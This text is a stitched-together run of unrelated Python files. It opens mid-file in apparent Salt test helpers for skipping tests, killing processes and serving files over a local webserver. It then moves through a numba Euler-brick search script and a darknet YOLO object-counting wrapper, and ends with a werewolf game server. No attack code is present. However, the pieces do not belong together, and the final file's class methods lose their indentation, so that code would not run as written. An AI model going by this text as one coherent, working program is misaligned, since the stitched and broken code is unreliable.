    Returns a skip decorator, or the identity decorator when nothing is
    missing.
    '''
    # salt.utils is imported lazily, at decorator-evaluation time.
    import salt.utils
    if len(binaries) == 1:
        # Allow passing a single iterable of binary names.
        if isinstance(binaries[0], (list, tuple, set, frozenset)):
            binaries = binaries[0]
    check_all = kwargs.pop('check_all', False)
    message = kwargs.pop('message', None)
    if kwargs:
        raise RuntimeError(
            'The only supported keyword argument is \'check_all\' and '
            '\'message\'. Invalid keyword arguments: {0}'.format(
                ', '.join(kwargs.keys())
            )
        )
    if check_all:
        # ALL binaries are required: skip on the first missing one.
        for binary in binaries:
            if salt.utils.which(binary) is None:
                return skip(
                    '{0}The {1!r} binary was not found'.format(
                        message and '{0}. '.format(message) or '',
                        binary
                    )
                )
    elif salt.utils.which_bin(binaries) is None:
        # At least ONE binary is required.
        return skip(
            '{0}None of the following binaries was found: {1}'.format(
                message and '{0}. '.format(message) or '',
                ', '.join(binaries)
            )
        )
    # Everything required is present; decorate with the identity function.
    return _id
def skip_if_not_root(func):
    '''
    Mark ``func`` as skipped (via the unittest skip attributes) unless the
    current user is root (POSIX) or an Administrator/SYSTEM account (Windows).
    '''
    if not sys.platform.startswith('win'):
        if os.getuid() != 0:
            func.__unittest_skip__ = True
            func.__unittest_skip_why__ = 'You must be logged in as root to run this test'
    else:
        # Windows: SYSTEM always qualifies; otherwise require admin rights.
        import salt.utils.win_functions
        current_user = salt.utils.win_functions.get_current_user()
        if current_user != 'SYSTEM':
            if not salt.utils.win_functions.is_admin(current_user):
                func.__unittest_skip__ = True
                func.__unittest_skip_why__ = 'You must be logged in as an Administrator to run this test'
    return func
# Windows has no SIGTERM that can be delivered to console subprocesses;
# CTRL_BREAK_EVENT is the closest equivalent used by the termination helpers
# below.
if sys.platform.startswith('win'):
    SIGTERM = signal.CTRL_BREAK_EVENT  # pylint: disable=no-member
else:
    SIGTERM = signal.SIGTERM
def collect_child_processes(pid):
    '''
    Try to collect any started child processes of the provided pid
    '''
    try:
        parent = psutil.Process(pid)
        # Older psutil releases may lack Process.children().
        if hasattr(parent, 'children'):
            children = parent.children(recursive=True)
        else:
            children = []
    except psutil.NoSuchProcess:
        # Parent already exited: nothing to collect.
        children = []
    # Reversed so the deepest descendants come first.
    return children[::-1]
def _terminate_process_list(process_list, kill=False, slow_stop=False):
    '''
    Single in-place pass over ``process_list``: terminate (or kill) each
    entry and prune the ones that are already gone.
    '''
    for process in process_list[:][::-1]:  # Iterate over a reversed copy of the list
        if not psutil.pid_exists(process.pid):
            process_list.remove(process)
            continue
        try:
            if not kill and process.status() == psutil.STATUS_ZOMBIE:
                # Zombie processes will exit once child processes also exit
                continue
            try:
                cmdline = process.cmdline()
            except psutil.AccessDenied:
                # OSX is more restrictive about the above information
                cmdline = None
            if not cmdline:
                try:
                    cmdline = process.as_dict()
                except Exception:
                    cmdline = 'UNKNOWN PROCESS'
            if kill:
                log.info('Killing process(%s): %s', process.pid, cmdline)
                process.kill()
            else:
                log.info('Terminating process(%s): %s', process.pid, cmdline)
                try:
                    if slow_stop:
                        # Allow coverage data to be written down to disk
                        process.send_signal(SIGTERM)
                        try:
                            process.wait(2)
                        except psutil.TimeoutExpired:
                            # Still alive after the grace period; leave it for
                            # a later (harder) pass.
                            if psutil.pid_exists(process.pid):
                                continue
                    else:
                        process.terminate()
                except OSError as exc:
                    if exc.errno not in (errno.ESRCH, errno.EACCES):
                        raise
            if not psutil.pid_exists(process.pid):
                process_list.remove(process)
        except psutil.NoSuchProcess:
            process_list.remove(process)
def terminate_process_list(process_list, kill=False, slow_stop=False):
    '''
    Terminate every process in ``process_list``, escalating from the
    requested termination mode to an unconditional kill over three passes.
    '''
    def on_process_terminated(proc):
        log.info('Process %s terminated with exit code: %s', getattr(proc, '_cmdline', proc), proc.returncode)

    # Try to terminate processes with the provided kill and slow_stop parameters
    log.info('Terminating process list. 1st step. kill: %s, slow stop: %s', kill, slow_stop)

    # Cache the cmdline since that will be inaccessible once the process is terminated
    for proc in process_list:
        try:
            cmdline = proc.cmdline()
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            # OSX is more restrictive about the above information
            cmdline = None
        if not cmdline:
            try:
                # NOTE(review): a plain assignment cannot raise the psutil
                # errors caught below — this except branch looks dead; was
                # ``proc.as_dict()`` intended here?
                cmdline = proc
            except (psutil.NoSuchProcess, psutil.AccessDenied):
                cmdline = '<could not be retrived; dead process: {0}>'.format(proc)
        proc._cmdline = cmdline
    _terminate_process_list(process_list, kill=kill, slow_stop=slow_stop)
    psutil.wait_procs(process_list, timeout=15, callback=on_process_terminated)

    if process_list:
        # If there's still processes to be terminated, retry and kill them if slow_stop is False
        log.info('Terminating process list. 2nd step. kill: %s, slow stop: %s', slow_stop is False, slow_stop)
        _terminate_process_list(process_list, kill=slow_stop is False, slow_stop=slow_stop)
        psutil.wait_procs(process_list, timeout=10, callback=on_process_terminated)

    if process_list:
        # If there's still processes to be terminated, just kill them, no slow stopping now
        log.info('Terminating process list. 3rd step. kill: True, slow stop: False')
        _terminate_process_list(process_list, kill=True, slow_stop=False)
        psutil.wait_procs(process_list, timeout=5, callback=on_process_terminated)

    if process_list:
        # In there's still processes to be terminated, log a warning about it
        log.warning('Some processes failed to properly terminate: %s', process_list)
def terminate_process(pid=None, process=None, children=None, kill_children=False, slow_stop=False):
    '''
    Try to terminate/kill the started processe
    '''
    children = children or []
    process_list = []

    def on_process_terminated(proc):
        if proc.returncode:
            log.info('Process %s terminated with exit code: %s', getattr(proc, '_cmdline', proc), proc.returncode)
        else:
            log.info('Process %s terminated', getattr(proc, '_cmdline', proc))

    if pid and not process:
        # Resolve the pid into a psutil handle when one wasn't supplied.
        try:
            process = psutil.Process(pid)
            process_list.append(process)
        except psutil.NoSuchProcess:
            # Process is already gone
            process = None

    if kill_children:
        if process:
            if not children:
                children = collect_child_processes(process.pid)
            else:
                # Let's collect children again since there might be new ones
                children.extend(collect_child_processes(pid))
        if children:
            process_list.extend(children)

    if process_list:
        if process:
            log.info('Stopping process %s and respective children: %s', process, children)
        else:
            log.info('Terminating process list: %s', process_list)
        terminate_process_list(process_list, kill=slow_stop is False, slow_stop=slow_stop)
        if process and psutil.pid_exists(process.pid):
            log.warning('Process left behind which we were unable to kill: %s', process)
def terminate_process_pid(pid, only_children=False):
    '''
    Terminate the process behind ``pid`` together with all of its children,
    or only the children when ``only_children`` is True.
    '''
    children = []
    process = None

    # Let's begin the shutdown routines
    try:
        process = psutil.Process(pid)
        children = collect_child_processes(pid)
    except psutil.NoSuchProcess:
        log.info('No process with the PID %s was found running', pid)

    if only_children:
        return terminate_process(children=children, kill_children=True, slow_stop=True)
    return terminate_process(pid=pid, process=process, children=children, kill_children=True, slow_stop=True)
def repeat(caller=None, condition=True, times=5):
    '''
    Repeat a test X amount of times until the first failure.

    .. code-block:: python

        class MyTestCase(TestCase):

            @repeat
            def test_sometimes_works(self):
                pass
    '''
    if caller is None:
        # Invoked as ``@repeat(...)`` with arguments: return the real decorator.
        return functools.partial(repeat, condition=condition, times=times)

    if isinstance(condition, bool) and condition is False:
        # Don't even decorate
        return caller
    elif callable(condition):
        if condition() is False:
            # Don't even decorate
            return caller

    if inspect.isclass(caller):
        # Decorating a class: recursively wrap every ``test_`` attribute.
        attrs = [n for n in dir(caller) if n.startswith('test_')]
        for attrname in attrs:
            try:
                function = getattr(caller, attrname)
                if not inspect.isfunction(function) and not inspect.ismethod(function):
                    continue
                setattr(caller, attrname, repeat(caller=function, condition=condition, times=times))
            except Exception as exc:
                log.exception(exc)
                continue
        return caller

    @functools.wraps(caller)
    def wrap(cls):
        result = None  # NOTE(review): never reassigned or returned — looks vestigial.
        for attempt in range(1, times+1):
            log.info('%s test run %d of %s times', cls, attempt, times)
            caller(cls)
        return cls
    return wrap
def http_basic_auth(login_cb=lambda username, password: False):
    '''
    A crude decorator to force a handler to request HTTP Basic Authentication

    Example usage:

    .. code-block:: python

        @http_basic_auth(lambda u, p: u == 'foo' and p == 'bar')
        class AuthenticatedHandler(tornado.web.RequestHandler):
            pass
    '''
    def wrapper(handler_class):
        def wrap_execute(handler_execute):
            def check_auth(handler, kwargs):
                auth = handler.request.headers.get('Authorization')

                if auth is None or not auth.startswith('Basic '):
                    # No username/password entered yet, we need to return a 401
                    # and set the WWW-Authenticate header to request login.
                    handler.set_status(401)
                    handler.set_header(
                        'WWW-Authenticate', 'Basic realm=Restricted')
                else:
                    # Strip the 'Basic ' from the beginning of the auth header
                    # leaving the base64-encoded secret
                    # NOTE(review): on Python 3, b64decode() returns bytes and
                    # splitting on the str ':' raises TypeError — confirm the
                    # targeted Python version.
                    username, password = \
                        base64.b64decode(auth[6:]).split(':', 1)

                    if login_cb(username, password):
                        # Authentication successful
                        return
                    else:
                        # Authentication failed
                        handler.set_status(403)

                # Unauthenticated: short-circuit the response.
                handler._transforms = []
                handler.finish()

            def _execute(self, transforms, *args, **kwargs):
                check_auth(self, kwargs)
                return handler_execute(self, transforms, *args, **kwargs)

            return _execute

        handler_class._execute = wrap_execute(handler_class._execute)
        return handler_class
    return wrapper
def generate_random_name(prefix, size=6):
    '''
    Generates a random name by combining the provided prefix with a randomly
    generated ascii string.

    .. versionadded:: Oxygen

    prefix
        The string to prefix onto the randomly generated ascii string.

    size
        The number of characters to generate. Default: 6.
    '''
    alphabet = string.ascii_uppercase + string.digits
    suffix = ''.join(random.choice(alphabet) for _ in range(size))
    return prefix + suffix
class Webserver(object):
    '''
    Starts a tornado webserver on 127.0.0.1 on a random available port

    USAGE:

    .. code-block:: python

        from tests.support.helpers import Webserver

        webserver = Webserver('/path/to/web/root')
        webserver.start()
        webserver.stop()
    '''
    def __init__(self,
                 root=None,
                 port=None,
                 wait=5,
                 handler=None):
        '''
        root
            Root directory of webserver. If not passed, it will default to the
            location of the base environment of the integration suite's file
            roots (tests/integration/files/file/base/)

        port
            Port on which to listen. If not passed, a random one will be chosen
            at the time the start() function is invoked.

        wait : 5
            Number of seconds to wait for the socket to be open before raising
            an exception

        handler
            Can be used to use a subclass of tornado.web.StaticFileHandler,
            such as when enforcing authentication with the http_basic_auth
            decorator.
        '''
        if port is not None and not isinstance(port, six.integer_types):
            raise ValueError('port must be an integer')

        if root is None:
            root = os.path.join(FILES, 'file', 'base')
        try:
            self.root = os.path.realpath(root)
        except AttributeError:
            # os.path.realpath blows up with AttributeError on non-strings.
            raise ValueError('root must be a string')

        self.port = port
        self.wait = wait
        self.handler = handler \
            if handler is not None \
            else tornado.web.StaticFileHandler
        # Set by start(); None means "not started yet".
        self.web_root = None

    def target(self):
        '''
        Threading target which stands up the tornado application
        '''
        self.ioloop = tornado.ioloop.IOLoop()
        self.ioloop.make_current()
        self.application = tornado.web.Application(
            [(r'/(.*)', self.handler, {'path': self.root})])
        self.application.listen(self.port)
        self.ioloop.start()

    @property
    def listening(self):
        # connect_ex() returning 0 means something accepted the connection.
        if self.port is None:
            return False
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        return sock.connect_ex(('127.0.0.1', self.port)) == 0

    def url(self, path):
        '''
        Convenience function which, given a file path, will return a URL that
        points to that path. If the path is relative, it will just be appended
        to self.web_root.
        '''
        if self.web_root is None:
            raise RuntimeError('Webserver instance has not been started')
        err_msg = 'invalid path, must be either a relative path or a path ' \
                  'within {0}'.format(self.root)
        try:
            relpath = path \
                if not os.path.isabs(path) \
                else os.path.relpath(path, self.root)
            if relpath.startswith('..' + os.sep):
                # Path escapes the web root.
                raise ValueError(err_msg)
            return '/'.join((self.web_root, relpath))
        except AttributeError:
            raise ValueError(err_msg)

    def start(self):
        '''
        Starts the webserver
        '''
        if self.port is None:
            self.port = get_unused_localhost_port()

        self.web_root = 'http://127.0.0.1:{0}'.format(self.port)

        self.server_thread = threading.Thread(target=self.target)
        self.server_thread.daemon = True
        self.server_thread.start()

        # Poll once per second until the socket accepts connections, or give
        # up after ``wait`` seconds.
        for idx in range(self.wait + 1):
            if self.listening:
                break
            if idx != self.wait:
                time.sleep(1)
            else:
                raise Exception(
                    'Failed to start tornado webserver on 127.0.0.1:{0} within '
                    '{1} seconds'.format(self.port, self.wait)
                )

    def stop(self):
        '''
        Stops the webserver
        '''
        self.ioloop.add_callback(self.ioloop.stop)
        self.server_thread.join()
|
numbafollower.py | from multiprocessing import Process
from numba import jit
import math
import time
import decimal
import os
import random
@jit
def computeit( ):
    # Endlessly search for Euler bricks / perfect cuboids in the neighborhood
    # of previously found bricks (read from bricked.txt), logging hits to
    # face2.txt / face3.txt / brick.txt / perfectcube.txt.
    # NOTE(review): the body uses decimal and file I/O, which numba cannot
    # compile — @jit presumably falls back to object mode here; confirm it
    # actually helps.
    decimal.getcontext().prec = 200
    runsize = 1000
    x = 0
    y = 0
    z = 0
    face1 = decimal.Decimal(int(0))  # NOTE(review): never used below.
    face2 = decimal.Decimal(int(0))
    face3 = decimal.Decimal(int(0))
    runcount = 0  # NOTE(review): never used below.
    diagonal = decimal.Decimal(int(0))
    eulerfound = 0
    perfectfound = 0
    totalboxes = 0
    while 1 > 0:
        # Pick a random previously-found brick as the center of a new
        # (2*runsize)^3 search window.
        Filehandle = open("bricked.txt","r")
        Filecontents = Filehandle.readlines()
        linenum = random.randint(1, len(Filecontents) - 1)
        Linecontents = Filecontents[linenum].split()
        xstart = int(Linecontents[1]) - runsize
        ystart = int(Linecontents[3]) - runsize
        zstart = int(Linecontents[5]) - runsize
        x = xstart
        y = ystart
        z = zstart
        # Clamp the window to positive edge lengths.
        if x < 1:
            x = 1
        if y < 1:
            y = 1
        if z < 1:
            z = 1
        z = 0
        Filehandle.close()
        while x < xstart + runsize + runsize:
            x = x + 1
            y = ystart
            #os.system('cls')
            print ("boxes: " + str(totalboxes) + " Euler Bricks found: " + str(eulerfound) + " Perfect Cuboids found: " + str(perfectfound))
            print ("X: " + str(x) + " y: " + str(y) + " z: " + str(z))
            while y < ystart + runsize + runsize:
                y = y + 1
                z = zstart
                if y < 1:
                    y = 1
                if z < 1:
                    z = 1
                while z < zstart + runsize + runsize:
                    totalboxes += 1
                    z += 1
                    # face2/face3: diagonals of the x-z and y-z faces; an
                    # integer square root means the face diagonal is integral.
                    face2 = decimal.Decimal((x * x) + (z * z))
                    face2 = face2.sqrt()
                    face3 = decimal.Decimal((y * y) + (z * z))
                    face3 = face3.sqrt()
                    if face2 %1 == 0:
                        file = open('face2.txt', 'a')
                        file.write('\n')
                        file.write('x: ' + str(x)+ " z: " + str(z))
                        file.close()
                    if face3 %1 == 0:
                        file = open('face3.txt', 'a')
                        file.write('\n')
                        file.write('y: ' + str(y)+ " z: " + str(z))
                        file.close()
                    if face2 %1 == 0 and face3 %1 == 0:
                        # Both face diagonals integral -> Euler brick; also
                        # test the space diagonal for a perfect cuboid.
                        file = open('brick.txt', 'a')
                        file.write('\n')
                        file.write('x: ' + str(x)+ " y: " + str(y) + " z: " + str(z))
                        file.close()
                        eulerfound += 1
                        diagonal = decimal.Decimal((x * x) + (y * y) + (z * z))
                        diagonal = diagonal.sqrt()
                        if diagonal % 1 == 0:
                            print (diagonal)
                            perfectfound += 1
                            file = open('perfectcube.txt', 'a')
                            file.write('\n')
                            file.write('x: ' + str(x)+ " y: " + str(y) + " z: " + str(z))
                            file.close()
if __name__ == '__main__':
    # Launch eight independent worker processes, each running the same
    # unbounded computeit() search loop.
    for _ in range(8):
        worker = Process(target=computeit, args=())
        worker.start()
|
countPersons.py | # -*- coding: utf-8 -*-
from ctypes import *
import math
import random
import threading
import time #テスト用あとで削除
import darknet
import main_test
def sample(probs):
    """Draw a random index weighted by ``probs`` (normalized to sum to 1).

    Falls back to the last index if rounding leaves the draw unconsumed.
    """
    total = sum(probs)
    weights = [p / total for p in probs]
    draw = random.uniform(0, 1)
    for index, weight in enumerate(weights):
        draw -= weight
        if draw <= 0:
            return index
    return len(weights) - 1
def c_array(ctype, values):
    """Build and fill a ctypes array of ``ctype`` from ``values``."""
    array_type = ctype * len(values)
    arr = array_type()
    arr[:] = values
    return arr
class BOX(Structure):
    """ctypes mirror of darknet's bounding-box struct (center x/y, width, height as floats)."""
    _fields_ = [("x", c_float),
                ("y", c_float),
                ("w", c_float),
                ("h", c_float)]
class DETECTION(Structure):
    """ctypes mirror of one darknet detection: bbox plus per-class probability/mask arrays and NMS bookkeeping."""
    _fields_ = [("bbox", BOX),
                ("classes", c_int),
                ("prob", POINTER(c_float)),
                ("mask", POINTER(c_float)),
                ("objectness", c_float),
                ("sort_class", c_int)]
class IMAGE(Structure):
    """ctypes mirror of darknet's image struct (width, height, channels, float pixel buffer)."""
    _fields_ = [("w", c_int),
                ("h", c_int),
                ("c", c_int),
                ("data", POINTER(c_float))]
class METADATA(Structure):
    """ctypes mirror of darknet's metadata struct: class count and class-name strings."""
    _fields_ = [("classes", c_int),
                ("names", POINTER(c_char_p))]
#lib = CDLL("/home/pjreddie/documents/darknet/libdarknet.so", RTLD_GLOBAL)
# Load the compiled darknet shared library and declare the argument/return
# types for every C entry point used by this module.
lib = CDLL("/home/team-emb/gra_thesis/darknet/libdarknet.so", RTLD_GLOBAL)
lib.network_width.argtypes = [c_void_p]
lib.network_width.restype = c_int
lib.network_height.argtypes = [c_void_p]
lib.network_height.restype = c_int

# Raw forward pass over a float buffer.
predict = lib.network_predict
predict.argtypes = [c_void_p, POINTER(c_float)]
predict.restype = POINTER(c_float)

set_gpu = lib.cuda_set_device
set_gpu.argtypes = [c_int]

make_image = lib.make_image
make_image.argtypes = [c_int, c_int, c_int]
make_image.restype = IMAGE

# Detection extraction and non-max suppression helpers.
get_network_boxes = lib.get_network_boxes
get_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]
get_network_boxes.restype = POINTER(DETECTION)

make_network_boxes = lib.make_network_boxes
make_network_boxes.argtypes = [c_void_p]
make_network_boxes.restype = POINTER(DETECTION)

# C-side memory management (must be called to avoid leaks).
free_detections = lib.free_detections
free_detections.argtypes = [POINTER(DETECTION), c_int]

free_ptrs = lib.free_ptrs
free_ptrs.argtypes = [POINTER(c_void_p), c_int]

network_predict = lib.network_predict
network_predict.argtypes = [c_void_p, POINTER(c_float)]

reset_rnn = lib.reset_rnn
reset_rnn.argtypes = [c_void_p]

# Network/metadata loading.
load_net = lib.load_network
load_net.argtypes = [c_char_p, c_char_p, c_int]
load_net.restype = c_void_p

do_nms_obj = lib.do_nms_obj
do_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]

do_nms_sort = lib.do_nms_sort
do_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]

free_image = lib.free_image
free_image.argtypes = [IMAGE]

letterbox_image = lib.letterbox_image
letterbox_image.argtypes = [IMAGE, c_int, c_int]
letterbox_image.restype = IMAGE

load_meta = lib.get_metadata
lib.get_metadata.argtypes = [c_char_p]
lib.get_metadata.restype = METADATA

load_image = lib.load_image_color
load_image.argtypes = [c_char_p, c_int, c_int]
load_image.restype = IMAGE

rgbgr_image = lib.rgbgr_image
rgbgr_image.argtypes = [IMAGE]

# Image-based forward pass (used by classify()/detect() below).
predict_image = lib.network_predict_image
predict_image.argtypes = [c_void_p, IMAGE]
predict_image.restype = POINTER(c_float)
def classify(net, meta, im):
    """Run the classifier net on `im` and return (label, score) pairs,
    sorted by descending score."""
    scores = predict_image(net, im)
    labelled = [(meta.names[idx], scores[idx]) for idx in range(meta.classes)]
    labelled.sort(key=lambda pair: pair[1], reverse=True)
    return labelled
def detect(net, meta, image, thresh=.5, hier_thresh=.5, nms=.45):
    """Run YOLO detection on the image at path `image`.

    Returns a list of (label, probability, (x, y, w, h)) tuples sorted by
    descending probability. Frees the C-side image and detection buffers
    before returning.
    """
    im = load_image(image, 0, 0)
    num = c_int(0)
    pnum = pointer(num)
    predict_image(net, im)
    dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)
    total = pnum[0]
    if nms:
        do_nms_obj(dets, total, meta.classes, nms)
    results = []
    for det_idx in range(total):
        det = dets[det_idx]
        for cls_idx in range(meta.classes):
            if det.prob[cls_idx] > 0:
                box = det.bbox
                results.append(
                    (meta.names[cls_idx], det.prob[cls_idx],
                     (box.x, box.y, box.w, box.h))
                )
    results.sort(key=lambda entry: entry[1], reverse=True)
    free_image(im)
    free_detections(dets, total)
    return results
#net = load_net("/home/team-emb/gra_thesis/darknet/cfg/yolov3.cfg", "/home/team-emb/gra_thesis/darknet/yolov3.weights", 0)
#meta = load_meta("/home/team-emb/gra_thesis/darknet/cfg/coco.data")
# Dead code: an abandoned draft of a Yolo wrapper class, kept as a bare
# string literal; it is never referenced.
'''
class Yolo():
def __init__(self,darknet.netConfig(),darknet.metaConfig()):
self.net = Net
self.meta = Meta
def count():
img = "/home/team-emb/gra_thesis/cap_img/cam_img.jpg"
r = detect(self.net, self.meta, img)
'''
# Show a standby indicator on a background thread while the (slow) YOLO
# network weights load, then stop it once loading finishes.
# NOTE(review): `main_test` and `threading` are assumed to be imported
# earlier in this file — verify.
main_test.stb_mode = True
t3 = threading.Thread(target=main_test.standbySign)
t3.start()
net = load_net("/home/team-emb/gra_thesis/darknet/cfg/yolov3.cfg", "/home/team-emb/gra_thesis/darknet/yolov3.weights", 0)
meta = load_meta("/home/team-emb/gra_thesis/darknet/cfg/coco.data")
main_test.stb_mode = False
t3.join()
def count():
    """Detect objects in the captured camera frame and return how many
    detections were found."""
    capture_path = "/home/team-emb/gra_thesis/cap_img/cam_img.jpg"
    detections = detect(net, meta, capture_path)
    return len(detections)
if __name__ == "__main__":
    #net = load_net("cfg/densenet201.cfg", "/home/pjreddie/trained/densenet201.weights", 0)
    #im = load_image("data/wolf.jpg", 0, 0)
    #meta = load_meta("cfg/imagenet1k.data")
    #r = classify(net, meta, im)
    #print r[:10]
    # Continuously report the number of objects in the latest camera frame.
    # BUG FIX: the original called `count(img)`, but count() takes no
    # arguments and `img` is never defined at module scope, so the first
    # iteration raised NameError/TypeError.
    while True:
        num = count()
        print(num)
|
logic.py | from random import randint, shuffle
import socket
from socket import AF_INET, SOCK_STREAM, AF_INET6
from threading import Thread
from typing import Any, Dict, Tuple
from time import sleep
from .abstraction import *
from ..WP import ChunckedData, _recv, KillableThread
from .util import *
class Game:
"""
# Game - the main class for game logic
class Game implements the communication process and the whole game process. Provides interfaces for customizing a game.
# Attributes
- playerCount : `int`, the number of the players
- allPlayer : `dict`, the seat number and identity of every player who has joined, including eliminated ones.
- activePlayer: `dict`, the number and the identity of remaining player.
- Key : `int`, the identification number of each player (or you can say seat number)
- Value : `Any`, the identity of each player, should be a class in `abstraction.py`
- ports : `list`, the ports available for communication with the player
- running : `bool`, the status of the game, can set to `True` when the `identityList` is empty and the length of `activePlayer` equals with `playerCount`
- identityList: `list`, used when allocating the user identity
- listener : `IncomingConnection`, the thread for receiving handshakes
# Methods
- `__init__()`: Initialize a new game class
- `startListening()`: Starts listening for clients
- `activate()`: Set the `running` attribute to `True` to prevent further modification
- `deactivate()`: Set the `running` attribute to `False` to prevent further modification
- `setIdentityList()`: Generate an identity configuration according to the given parameter
- `addPlayer()`: add a player to the game after receiving a packet
- `checkStatus()`: Check whether the stopping criterion is triggered
- Stopping criterion: either werewolves, villagers, skilled villagers are all eliminated
- ``
"""
def __init__(self, playerCount: int, ipv4: str = '', ipv6: str = '', port: int = 21567):
    """
    Initialize a new game.

    # Parameter

    - playerCount: `int`, the number of players in a game
    - ipv4: `str`, the IPv4 address of the server ('' binds all interfaces)
    - ipv6: `str`, the IPv6 address of the server ('' binds all interfaces)
    - port: `int`, the port of the server, used for listening to the incoming connection

    # Return

    A `Game` object
    """
    # Attribute initialization
    self.playerCount: int = playerCount
    self.allPlayer: Dict[int, Any] = {}     # seat -> player; never shrinks
    self.activePlayer: Dict[int, Any] = {}  # seat -> player still in the game
    # Network parameters: one listening socket per address family.
    self.port = port
    self.ipv4 = ipv4
    self.ipv6 = ipv6
    self.socketv4 = socket.socket(AF_INET, socket.SOCK_STREAM)
    self.socketv4.bind((ipv4, port))
    self.socketv4.listen(10)
    self.socketv6 = socket.socket(AF_INET6, socket.SOCK_STREAM)
    self.socketv6.bind((ipv6, port))
    self.socketv6.listen(10)
    # Game initialization parameters
    self.running: bool = False
    self.identityList: List[Any] = []
    # One accept-loop thread per listening socket.
    self.listener4: IncomingConnection = IncomingConnection(
        self.socketv4, self)
    self.listener6: IncomingConnection = IncomingConnection(
        self.socketv6, self)
    # Further initialization
    if True:  # Used for indention
        self.listener4.setName("IPV4 incoming connection receiver")
        self.listener6.setName("IPV6 incoming connection receiver")
    # Game parameters
    self.day: int = 0    # daytime round counter
    self.night: int = 0  # night round counter
    self.status: int = 0  # 0 while running; 1 villagers win; -1 wolves win (see checkStatus)
    self.victim: List[int] = []    # seats that died and are pending processing
    self.guardedLastNight: int = 0  # guard may not protect the same seat twice in a row
    self.hunterStatus: bool = True  # hunter may still fire (False once poisoned)
    self.kingofwolfStatus: bool = True  # king of werewolves may still use his skill
    self.explode: Optional[int] = None  # seat of a self-exploded wolf; dies after the next night
    # Verbose
def startListening(self):
    """
    Start listening for clients before the game starts. Must be called when
    the server is not listening.

    Blocks until every identity in `identityList` has been handed out (the
    listener threads pop it via addPlayer), then kills both listeners.

    # Parameter

    None

    # Return

    None
    """
    assert (
        self.identityList
    ), "The identity list must be initialized"  # The identity list should not be empty
    assert self.listener4.is_alive() == False, "There is already an active listener"
    assert self.listener6.is_alive() == False, "There is already an active listener"
    self.listener4.setDaemon(True)
    self.listener6.setDaemon(True)
    self.listener4.start()
    self.listener6.start()
    # BUG FIX: the original `while self.identityList: pass` busy-waited and
    # pinned a CPU core for the whole join phase; poll with a short sleep
    # instead. Behavior is unchanged: return only once all seats are taken.
    while self.identityList:
        sleep(0.1)
    sleep(1)  # grace period so the last addPlayer response can be sent
    self.listener4.kill()
    self.listener6.kill()
def activate(self):
    """
    Lock the game for start.

    Requires all identities to be allocated, a full table of players, and a
    fresh game state. Also introduces every wolf to each of its packmates
    via setPeer().
    """
    assert not self.identityList, "Identity not fully allocated"
    assert (
        len(self.activePlayer) == self.playerCount
    ), "The number of players is not enough"
    assert self.status == 0, "The game is already finished"
    assert self.day == 0 and self.night == 0
    self.running = True  # lock the game; no new players may join
    # Collect every wolf seat, then wire each pair of distinct wolves.
    wolves = [seat for seat in sorted(self.activePlayer.keys())
              if isinstance(self.activePlayer[seat], Wolf)]
    for first in wolves:
        for second in wolves:
            if first != second:
                self.activePlayer[first].setPeer(self.activePlayer[second])
def deactivate(self):
    """Mark the game as finished."""
    self.running = False
def checkStatus(self) -> int:
    """
    Check whether the game should be stopped.

    # Return

    An `int`, one of `-1`, `0`, `1` (also stored in `self.status`):

    - `-1`: the game stops and the werewolves win — either villagers or
      skilled villagers are all eliminated
    - `0`: the game continues
    - `1`: the game stops and the villagers win — the wolves are eliminated
    """
    villagers = wolves = skilled = 0
    for seat in sorted(self.activePlayer.keys()):
        role = self.activePlayer[seat]
        if isinstance(role, Villager):
            villagers += 1
        elif isinstance(role, Wolf):
            wolves += 1
        else:
            skilled += 1
    if skilled > 0 and villagers > 0 and wolves > 0:
        self.status = 0
    elif wolves == 0:
        self.status = 1
    else:
        self.status = -1
    return self.status
def broadcast(self, srcPlayer: Any, content: str):
    """
    Send `content` to every active player except `srcPlayer`.

    # Parameters

    - srcPlayer: the player to skip (pass None to inform everybody)
    - content: the text of the announcement

    # Return

    None
    """
    for seat in sorted(self.activePlayer.keys()):
        recipient = self.activePlayer[seat]
        if recipient is srcPlayer:
            continue
        recipient.inform(content)
def announceResult(self, status: bool):
    """Inform every player — alive or eliminated — of the final result."""
    for seat in sorted(self.allPlayer.keys()):
        self.allPlayer[seat].informResult(status)
def setIdentityList(self, **kwargs: int):
    """
    Initialize the identity configuration.

    # Parameter

    - Villager       : `int`, REQUIRED, the number of villagers
    - Wolf           : `int`, REQUIRED, the number of wolves
    - KingofWerewolf : `int`, optional, the number of kings of werewolves
    - WhiteWerewolf  : `int`, optional, the number of white werewolves
    - Predictor      : `int`, optional, the number of predictors
    - Witch          : `int`, optional, the number of witches
    - Hunter         : `int`, optional, the number of hunters
    - Guard          : `int`, optional, the number of guards
    - Idiot          : `int`, optional, the number of idiots

    `Villager` and `Wolf` counts must be **at least** 1; every identity in
    `uniqueIdentity` may appear **at most** once.

    # Return

    None
    """
    self.identityList = []
    assert "Villager" in kwargs, "The `Villager` parameter is required"
    assert "Wolf" in kwargs, "The `Wolf` parameter is required"
    for identity in kwargs:
        # Whitelist check: only names listed in availableIdentity may reach
        # the eval() below, so arbitrary code cannot be injected via kwargs.
        assert identity in availableIdentity
        if identity in uniqueIdentity:
            assert kwargs[identity] <= 1, "There should be at most 1 " + identity
        else:
            assert kwargs[identity] >= 1, "There should be at least 1 " + identity
        for _ in range(kwargs[identity]):
            # eval(identity) maps the role name to its class object.
            self.identityList.append(eval(identity))
            # BUG FIX: removed the dead expression statement `i + 1`, which
            # computed a value and discarded it (no effect).
    shuffle(self.identityList)
def addPlayer(self, connection: socket.socket, data: ChunckedData):
    """
    The server add a player to game after receiving a choose seat request.

    # Parameter

    - connection: the accepted client socket
    - data: data packet received.

    # Return

    None
    """
    assert self.running is False
    assert data.type == 1  # The packet type must match
    # `identityList` must be initialized
    assert len(self.identityList) != 0
    # Read the content of the packet
    # Verify the seat is available
    # Randomly allocate seat when the seat chosen is already taken
    # NOTE(review): the seat requested in `data` is never actually read —
    # every player gets a random free seat; confirm whether the client's
    # seat choice should be honored here.
    id = randint(1, self.playerCount)
    while id in sorted(self.activePlayer.keys()):
        id = randint(1, self.playerCount)
    # Pop the next shuffled identity class and instantiate it for this seat.
    newplayer = self.identityList.pop()(id=id, connection=connection)
    self.activePlayer[id] = newplayer
